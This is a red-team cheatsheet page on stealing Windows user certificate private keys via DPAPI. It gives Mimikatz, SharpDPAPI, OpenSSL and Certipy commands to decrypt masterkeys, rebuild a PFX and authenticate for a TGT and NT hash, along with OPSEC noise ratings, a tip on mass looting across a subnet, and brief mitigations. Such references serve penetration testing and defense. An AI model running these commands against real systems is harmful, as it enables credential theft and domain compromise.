daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

theft2-user-certificate-theft-via-dpapi.md (4312B)


      1 ---
      2 title: "THEFT2 — User Certificate Theft via DPAPI"
      3 description: "Windows protects user certificate private keys with DPAPI (Data Protection API). The encrypted key blobs live on disk; decrypting them normally requires…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "hashing"]
      7 tools: ["Mimikatz", "Certipy", "OpenSSL", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT2 — User Certificate Theft via DPAPI.md"
     11 ---
     12 # THEFT2 — User Certificate Theft via DPAPI
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Credential Theft (local, DPAPI) |
     19 | **Difficulty** | Medium |
     20 | **Pre-requisites** | Access as the user (or their password/hash, or the domain DPAPI backup key) |
     21 | **Tools** | SharpDPAPI, Mimikatz, Certipy, DonPAPI |
     22 | **OPSEC Noise** | Low — file reads + offline decryption |
     23 | **One-liner** | Decrypt a user's certificate private keys straight from the DPAPI-protected files on disk, without going through the certificate-store export APIs. |
     24 
     25 ***
     26 
     27 ## What Is THEFT2?
     28 
     29 Windows protects user certificate private keys with **DPAPI** (Data Protection API). The encrypted key blobs live on disk; decrypting them normally requires the user's logon secret. If you can read those files **and** obtain the DPAPI masterkey (via the user's password/NT hash, an existing logon session, or the domain's DPAPI backup key), you recover the private key offline, even when THEFT1's export APIs are blocked.
     30 
     31 **Key locations (per user):**
     32 
     33 ```
     34 Private keys : %APPDATA%\Microsoft\Crypto\RSA\<SID>\
     35                %APPDATA%\Microsoft\Crypto\Keys\        (CNG)
     36 Masterkeys   : %APPDATA%\Microsoft\Protect\<SID>\
     37 Certificates : %APPDATA%\Microsoft\SystemCertificates\My\Certificates\
     38 ```
     39 
     40 ***
     41 
     42 ## Step 1 — Decrypt the Masterkey
     43 
     44 ```powershell
     45 # From a live session as the user (Mimikatz auto-uses the logon secret)
     46 mimikatz # dpapi::masterkey /in:"%APPDATA%\Microsoft\Protect\<SID>\<GUID>" /rpc
     47 
     48 # With the user's password or NT hash (offline)
     49 mimikatz # dpapi::masterkey /in:<masterkeyfile> /sid:<SID> /password:Passw0rd!
     50 mimikatz # dpapi::masterkey /in:<masterkeyfile> /sid:<SID> /hash:<NTHASH>
     51 ```
     52 
     53 > [!tip] Domain DPAPI backup key = master skeleton
     54 > If you are Domain Admin, extract the domain DPAPI backup key once (`lsadump::backupkeys /system:DC01 /export`) and decrypt **any** user's masterkeys forever: `dpapi::masterkey /in:<mk> /pvk:backupkey.pvk`.
     55 
     56 ***
     57 
     58 ## Step 2 — Decrypt the Private Key + Rebuild the PFX
     59 
     60 ```powershell
     61 # One-shot: SharpDPAPI finds certs, decrypts masterkeys, outputs .pem/.pfx
     62 SharpDPAPI.exe certificates /mkfile:masterkeys.txt        # provide decrypted masterkeys
     63 SharpDPAPI.exe certificates /pvk:backupkey.pvk            # or the domain backup key
     64 ```
     65 
     66 ```powershell
     67 # Mimikatz manual path
     68 mimikatz # dpapi::capi /in:"%APPDATA%\Microsoft\Crypto\RSA\<SID>\<keyfile>"
     69 # combine the recovered key with the public cert into a pfx with openssl
     70 ```
     71 
     72 ```bash
     73 # openssl: stitch the decrypted key + cert into a usable pfx
     74 openssl pkcs12 -export -inkey stolen.key -in stolen.crt -out stolen.pfx
     75 ```
     76 
     77 ***
     78 
     79 ## Step 3 — Authenticate
     80 
     81 ```bash
     82 certipy-ad auth -pfx stolen.pfx -dc-ip $TARGET      # PKINIT -> TGT + NT hash
     83 ```
     84 
     85 > [!tip] DonPAPI / Certipy remote
     86 > `DonPAPI` automates remote DPAPI cert looting across many hosts. Handy when sweeping a subnet after gaining a domain foothold.
     87 
     88 ***
     89 
     90 ## OPSEC Considerations
     91 
     92 | Action | Artefact | Noise |
     93 | :-- | :-- | :-- |
     94 | Reading Crypto/Protect files | file access events (if audited) | 🟢 Low |
     95 | Offline masterkey decryption | none (off-host) | 🟢 Low |
     96 | `lsadump::backupkeys` on DC | LSASS access on DC | 🔴 High |
     97 
     98 ***
     99 
    100 ## Mitigation
    101 
    102 - Protect keys with TPM/HSM so DPAPI blobs alone are useless.
    103 - Rotate the **domain DPAPI backup key** if DA compromise is suspected (non-trivial).
    104 - Limit lateral movement so attackers cannot read other users' profiles.
    105 - Monitor DC access to `lsadump::backupkeys` behaviour and mass profile reads.
    106 
    107 ***
    108 
    109 ## See Also
    110 
    111 - _ADCS Attack Methodology Guide · THEFT1 — Exporting Certificates and Keys · THEFT3 — Machine Certificate Theft via DPAPI
    112 - Sources: SpecterOps *Certified Pre-Owned*; [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)